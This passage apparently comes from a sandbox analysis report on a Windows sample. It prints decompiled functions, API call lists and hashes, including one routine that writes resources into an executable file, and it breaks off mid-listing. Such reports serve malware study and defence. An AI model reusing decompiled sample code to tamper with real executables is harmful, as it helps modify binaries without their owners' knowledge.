                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$ScrollVisible
                                                    • String ID: tC
                                                    • API String ID: 4127837035-1085749316
                                                    • Opcode ID: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                    • Instruction ID: d3335ac6ad808ac153b7fdabc62b5b7bad948aac8996c4e76790ef358f9a02f4
                                                    • Opcode Fuzzy Hash: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                    • Instruction Fuzzy Hash: AA219F71704700AFE710DF6AC880B6B77D4AF88754F14856EFA48CB262D738EC45875A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0047D01C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,00000000,0047D0D2), ref: 0047D05E
                                                    • GetFileSize.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000), ref: 0047D096
                                                    • CloseHandle.KERNEL32(?,0047D0BC,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 0047D0AF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleSize
                                                    • String ID: lI
                                                    • API String ID: 1378416451-2224401619
                                                    • Opcode ID: 65a7822fe3a389ac1c9a09b887512d4a6e3414963bc98b9a02b16acb343bd438
                                                    • Instruction ID: 286afb8c99021898e2bdb5b6e8095afefc1f981a6a11c4acb5445e704e613de7
                                                    • Opcode Fuzzy Hash: 65a7822fe3a389ac1c9a09b887512d4a6e3414963bc98b9a02b16acb343bd438
                                                    • Instruction Fuzzy Hash: D6117970A04204BFEB11DBA9CC52F5AB7B8EB09704F5184B6FA14E76D0DA79AD108A18
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00494694 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E00494694(void* __eax) {
				long _t18;
				void* _t20;
				void* _t21;

				_t21 = __eax;
				 *((intOrPtr*)(__eax + 0x48)) = 5;
				 *(_t21 + 0x50) = CreateEventA(0, 0xffffffff, 0, 0);
				 *((intOrPtr*)(_t21 + 0x4c)) = CreateEventA(0, 0xffffffff, 0, 0);
				asm("cmc");
				asm("sbb eax, eax");
				_t18 = RegNotifyChangeKeyValue( *( *((intOrPtr*)(_t21 + 0x40)) + 4),  *(_t21 + 0x44),  *(_t21 + 0x48),  *(_t21 + 0x50), 0xffffffff);
				if(_t18 != 0) {
					_t20 = E0040D144("Can not start monitoring", 1);
					E00404378();
					return _t20;
				}
				return _t18;
			}






                                                    0x00494695
                                                    0x00494697
                                                    0x004946ab
                                                    0x004946bb
                                                    0x004946cf
                                                    0x004946d0
                                                    0x004946da
                                                    0x004946e1
                                                    0x004946ef
                                                    0x004946f4
                                                    0x00000000
                                                    0x004946f4
                                                    0x004946fa

                                                    APIs
                                                    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946A6
                                                    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946B6
                                                    • RegNotifyChangeKeyValue.ADVAPI32(?,?,00000005,?,000000FF,00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946DA
                                                    Strings
                                                    • Can not start monitoring, xrefs: 004946E3
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateEvent$ChangeNotifyValue
                                                    • String ID: Can not start monitoring
                                                    • API String ID: 2233126570-3835272546
                                                    • Opcode ID: 120cc25bb99064d1f3d8207132df81e4059a6af6159ea2c50c9c4d4b7a5d7901
                                                    • Instruction ID: 443d9707a36d2025ed6040a5d28f1c7387ed03c1380d4d8ed495eb8cf4c6426e
                                                    • Opcode Fuzzy Hash: 120cc25bb99064d1f3d8207132df81e4059a6af6159ea2c50c9c4d4b7a5d7901
                                                    • Instruction Fuzzy Hash: 02F0F4B06442016FDB54DFADCC85F1537A46F05715F1102A5FB14DF2D6E675DC048714
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00442ECC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00442ECC(struct HWND__* __eax, intOrPtr __ecx, char __edx, char _a4) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t19;
				struct HWND__* _t20;
				intOrPtr* _t23;

				_t20 = __eax;
				_t1 =  &_a4; // 0x443144
				_t23 =  *_t1;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 =  &_v12; // 0x443144
				ClientToScreen(__eax, _t4);
				GetWindowRect(_t20,  &_v28);
				_t6 =  &_v12; // 0x443144
				 *_t23 =  *_t6 - _v28.left;
				_t19 = _v8 - _v28.top;
				 *((intOrPtr*)(_t23 + 4)) = _t19;
				return _t19;
			}









                                                    0x00442ed4
                                                    0x00442ed6
                                                    0x00442ed6
                                                    0x00442ed9
                                                    0x00442edc
                                                    0x00442edf
                                                    0x00442ee4
                                                    0x00442eee
                                                    0x00442ef3
                                                    0x00442ef9
                                                    0x00442efe
                                                    0x00442f01
                                                    0x00442f09

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ClientRectScreenWindow
                                                    • String ID: D1D$D1D
                                                    • API String ID: 3371951266-2689743835
                                                    • Opcode ID: 633562e4aab1e9921d1e3a8e725f7fe5ddc9f249ff15e542360de7e665a61ded
                                                    • Instruction ID: 696a0ad0a36b5a628bc16ef9a9fef7e4a028d98c1b31806480246e0535002fd9
                                                    • Opcode Fuzzy Hash: 633562e4aab1e9921d1e3a8e725f7fe5ddc9f249ff15e542360de7e665a61ded
                                                    • Instruction Fuzzy Hash: 4DF0A2B5D0420DAFCB00DFE9C9818DEFBFCEB08250F10456AA945F3741E630AA408BA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040E884 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040E884() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x49b158 = _t1;
				}
				if( *0x49b158 == 0) {
					 *0x49b158 = E00409ED4;
					return E00409ED4;
				}
				return _t1;
			}





                                                    0x0040e88a
                                                    0x0040e88f
                                                    0x0040e893
                                                    0x0040e89b
                                                    0x0040e8a0
                                                    0x0040e8a0
                                                    0x0040e8ac
                                                    0x0040e8b3
                                                    0x00000000
                                                    0x0040e8b3
                                                    0x0040e8b9

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F2ED,00000000,0040F300), ref: 0040E88A
                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040E89B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                    • API String ID: 1646373207-3712701948
                                                    • Opcode ID: 43ed1c233b8431e60244e37b4123486ffc539a6091bd58410c1b071844e72ba0
                                                    • Instruction ID: 06fc51cb68962c5c382d4d7a2f86af93b26a51ec458fff072f92dd4ff1898c2b
                                                    • Opcode Fuzzy Hash: 43ed1c233b8431e60244e37b4123486ffc539a6091bd58410c1b071844e72ba0
                                                    • Instruction Fuzzy Hash: CFD09E62A043C55AF700BBA6A9EA7162658D720344B24C83BA000773D2D7FD4C94979D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00438E8C Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E00438E8C(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x49eb54 != 0) {
					L3:
					_t49 =  *0x49eb34; // 0x0
					_t50 =  *0x49eb34; // 0x0
					_t117 = E00438D6C(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x49eb54 == 0) {
						_t168 =  *0x49eb58;
						if( *0x49eb58 != 0) {
							_t106 =  *0x49eb48; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x49eb58; // 0x0
							E00443038(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x49eb34; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x49eb54;
						_t6 =  &_v24;
						 *_t6 =  *0x49eb54 != 0;
						__eflags =  *_t6;
						 *0x49eb54 = 2;
					} else {
						 *0x49eb54 = 1;
						_v24 = 0;
					}
					_t54 =  *0x49eb38; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x49eb38; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x49eb38; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x49eb38; // 0x0
							E0043AAC0( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x49eb38; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E00438DBC(2);
						_t121 =  *_t155;
						_t60 =  *0x49eb38; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x49eb58 != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x49eb58; // 0x0
								E00443020(_t82, _t158);
								_t84 =  *0x49eb58; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x49eb58; // 0x0
									E00443120(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x49eb58; // 0x0
									E00443038(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x49eb58; // 0x0
								E00443194(_t91, _t131, __eflags);
								_t93 =  *0x49de0c; // 0x49ebbc
								SetCursor(E004586EC( *_t93, _t158));
							}
						}
						_t62 =  *0x49de0c; // 0x49ebbc
						_t65 = SetCursor(E004586EC( *_t62, _t158));
						if( *0x49eb54 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E00438DF8(_t121);
								_t67 =  *0x49eb38; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E0043AAC0(_t118,  &_v24, _t155);
									_t65 = E00403DE8(_t118, __eflags);
									_t135 =  *0x49eb38; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x49eb38; // 0x0
									_t65 = E00403DE8( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x49eb38; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x49eb38; // 0x0
								_t65 = E00403DE8( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x49eb38 == 0) {
								goto L32;
							} else {
								_t119 =  *0x49eb38; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E00408E50(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x49eb38; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x49eb38; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x49eb38; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E00438DBC(1);
					if( *0x49eb38 == 0) {
						goto L32;
					}
					_t102 =  *0x49eb38; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x49eb38; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x49eb38; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E00438DBC(0);
					if( *0x49eb38 == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x49eb44; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x49eb50; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x49eb48; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x49eb50; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

















































                                                    0x00438e92
                                                    0x00438e9b
                                                    0x00438eca
                                                    0x00438eca
                                                    0x00438ed0
                                                    0x00438ee6
                                                    0x00438eef
                                                    0x00438ef1
                                                    0x00438ef8
                                                    0x00438efa
                                                    0x00438f00
                                                    0x00438f0d
                                                    0x00438f12
                                                    0x00438f12
                                                    0x00438ef8
                                                    0x00438f17
                                                    0x00438f23
                                                    0x00438f33
                                                    0x00438f3a
                                                    0x00438f3a
                                                    0x00438f3a
                                                    0x00438f3f
                                                    0x00438f25
                                                    0x00438f25
                                                    0x00438f2c
                                                    0x00438f2c
                                                    0x00438f46
                                                    0x00438f4e
                                                    0x00438f9b
                                                    0x00438f9b
                                                    0x00438fa2
                                                    0x00438fa8
                                                    0x00438fab
                                                    0x00438fb4
                                                    0x00438fbc
                                                    0x00438fc4
                                                    0x00438fc9
                                                    0x00438fd2
                                                    0x00438fd9
                                                    0x00438fd9
                                                    0x00438fe7
                                                    0x00438fe9
                                                    0x00438feb
                                                    0x00438ff5
                                                    0x00438ffe
                                                    0x00439002
                                                    0x0043900c
                                                    0x00439011
                                                    0x00439016
                                                    0x0043901b
                                                    0x0043901f
                                                    0x0043903a
                                                    0x0043903f
                                                    0x00439044
                                                    0x00439021
                                                    0x00439025
                                                    0x0043902c
                                                    0x0043902e
                                                    0x00439033
                                                    0x00439033
                                                    0x0043904b
                                                    0x0043904b
                                                    0x00439050
                                                    0x00439058
                                                    0x00439065
                                                    0x00439065
                                                    0x00439002
                                                    0x0043906d
                                                    0x0043907a
                                                    0x00439086
                                                    0x00439159
                                                    0x00439159
                                                    0x0043908c
                                                    0x0043908c
                                                    0x0043908e
                                                    0x004390af
                                                    0x004390b1
                                                    0x004390b6
                                                    0x004390b9
                                                    0x004390bb
                                                    0x004390e9
                                                    0x004390f8
                                                    0x004390fd
                                                    0x00439103
                                                    0x004390bd
                                                    0x004390c5
                                                    0x004390d1
                                                    0x004390d6
                                                    0x004390dc
                                                    0x004390dc
                                                    0x00439090
                                                    0x00439093
                                                    0x00439096
                                                    0x004390a3
                                                    0x004390a3
                                                    0x0043910d
                                                    0x00000000
                                                    0x0043910f
                                                    0x0043910f
                                                    0x00439115
                                                    0x00439118
                                                    0x00439120
                                                    0x00439127
                                                    0x00000000
                                                    0x00000000
                                                    0x0043912e
                                                    0x00439130
                                                    0x00439137
                                                    0x00439137
                                                    0x0043913a
                                                    0x00439141
                                                    0x00439144
                                                    0x0043914f
                                                    0x00439150
                                                    0x00439151
                                                    0x00439152
                                                    0x00000000
                                                    0x00439152
                                                    0x0043910d
                                                    0x00439086
                                                    0x00438f52
                                                    0x00438f5e
                                                    0x00000000
                                                    0x00000000
                                                    0x00438f64
                                                    0x00438f69
                                                    0x00438f6c
                                                    0x00438f74
                                                    0x00438f77
                                                    0x00438f7e
                                                    0x00438f84
                                                    0x00438f89
                                                    0x00438f95
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00438f95
                                                    0x00438e9d
                                                    0x00438ea4
                                                    0x00438ea9
                                                    0x00438eaf
                                                    0x00000000
                                                    0x00000000
                                                    0x00438eb1
                                                    0x00438eb9
                                                    0x00438ebc
                                                    0x00438ebe
                                                    0x00438ec4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00438F00
                                                    • GetDesktopWindow.USER32 ref: 00439025
                                                    • SetCursor.USER32(00000000), ref: 0043907A
                                                      • Part of subcall function 00443194: 739F1770.COMCTL32(00000000,?,00439055), ref: 004431B0
                                                      • Part of subcall function 00443194: ShowCursor.USER32(000000FF,00000000,?,00439055), ref: 004431CB
                                                    • SetCursor.USER32(00000000), ref: 00439065
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Cursor$DesktopWindow$F1770Show
                                                    • String ID:
                                                    • API String ID: 197431414-0
                                                    • Opcode ID: 4fc5646d0accbc32ff47cb35c82b75ec32605fa53f7b2747c4ff6197978172be
                                                    • Instruction ID: 7774f5f5771a5045a1e06358bb4aae0e40f1de296239ba1c3ef58bb47b11143b
                                                    • Opcode Fuzzy Hash: 4fc5646d0accbc32ff47cb35c82b75ec32605fa53f7b2747c4ff6197978172be
                                                    • Instruction Fuzzy Hash: 8C919174606241DFE704DF2AD885A06B7F1BB69314F14907BE4069B3A2CB78FC85CB4A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004107F0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E004107F0(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E00410638(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040F78C();
							E00410638(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040F794();
							E00410638(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E00410794(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E00410764(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040F79C();
						E00410638(_v780);
						E004109E8(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040F320();
				return E00410638(_v776);
			}






















                                                    0x004107fc
                                                    0x0041080c
                                                    0x00410813
                                                    0x00410813
                                                    0x0041081e
                                                    0x0041082c
                                                    0x0041083b
                                                    0x00410859
                                                    0x0041083d
                                                    0x00410848
                                                    0x00410848
                                                    0x00410868
                                                    0x00410874
                                                    0x00410877
                                                    0x00410879
                                                    0x0041087a
                                                    0x0041087c
                                                    0x00410882
                                                    0x00410884
                                                    0x00410893
                                                    0x00410894
                                                    0x0041089e
                                                    0x0041089f
                                                    0x004108a4
                                                    0x004108af
                                                    0x004108b0
                                                    0x004108ba
                                                    0x004108bb
                                                    0x004108c0
                                                    0x004108db
                                                    0x004108dd
                                                    0x004108de
                                                    0x004108e1
                                                    0x004108e1
                                                    0x00410882
                                                    0x004108ea
                                                    0x004108ed
                                                    0x004108ef
                                                    0x004108f0
                                                    0x004108f6
                                                    0x004108fc
                                                    0x004108fe
                                                    0x00410900
                                                    0x00410903
                                                    0x00410906
                                                    0x00410906
                                                    0x00410909
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00410909
                                                    0x00410909
                                                    0x00410910
                                                    0x0041091b
                                                    0x00410923
                                                    0x0041092a
                                                    0x00410931
                                                    0x00410932
                                                    0x00410937
                                                    0x00410942
                                                    0x00410942
                                                    0x00410950
                                                    0x00410954
                                                    0x0041095a
                                                    0x0041095b
                                                    0x0041096b

                                                    APIs
                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0041089F
                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004108BB
                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410932
                                                    • VariantClear.OLEAUT32(?), ref: 0041095B
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                    • String ID:
                                                    • API String ID: 920484758-0
                                                    • Opcode ID: f62daedad4aa8c7710ec9c5d668a78a66104b9c64cf44581b4746a34e544201c
                                                    • Instruction ID: 03341164d2f6fde75e1a46505fe440e945d96e45a0ae1fefe7a635db93ae447a
                                                    • Opcode Fuzzy Hash: f62daedad4aa8c7710ec9c5d668a78a66104b9c64cf44581b4746a34e544201c
                                                    • Instruction Fuzzy Hash: 1D412C75A0121D8FCB61EB59C890AC9B3BCAF48314F0041EAE54CE7202DA78AFC58F54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00477370 Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 57%
                                                    			E00477370(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v13;
				long _v20;
				void* _v24;
				struct HINSTANCE__* _t47;
				int _t53;
				char _t56;
				void* _t61;
				struct HINSTANCE__* _t64;
				intOrPtr _t69;
				intOrPtr _t75;
				intOrPtr* _t79;
				void* _t81;
				void* _t82;
				intOrPtr _t83;

				_t81 = _t82;
				_t83 = _t82 + 0xffffffec;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t81);
				_push(0x477494);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_t61 = BeginUpdateResourceA(E00404E80(_v8), 0);
				_v13 = _t61 != 0;
				if(_v13 == 0) {
					_pop(_t69);
					 *[fs:eax] = _t69;
					_push(0x47749b);
					return E004049E4( &_v12, 2);
				} else {
					 *[fs:eax] = _t83;
					_t64 =  *0x49ec78; // 0x0
					_t79 = E0041E0D0(_t64, 1, 0xa, _v12);
					_v20 =  *((intOrPtr*)( *_t79))( *[fs:eax], 0x477472, _t81);
					_v24 = E0040275C( *((intOrPtr*)( *_t79))());
					 *((intOrPtr*)( *_t79 + 0xc))();
					E00403BEC(_t79);
					_t47 =  *0x49ec78; // 0x0
					FreeLibrary(_t47);
					_t53 = UpdateResourceA(_t61, 0xa, E00404E80(_v12), 0, _v24, _v20);
					asm("sbb eax, eax");
					_v13 = _t53 + 1;
					if(EndUpdateResourceA(_t61, 0) == 0 || _v13 == 0) {
						_t56 = 0;
					} else {
						_t56 = 1;
					}
					_v13 = _t56;
					_pop(_t75);
					 *[fs:eax] = _t75;
					_push(0x477479);
					return E0040277C(_v24);
				}
			}



















                                                    0x00477371
                                                    0x00477373
                                                    0x00477379
                                                    0x0047737c
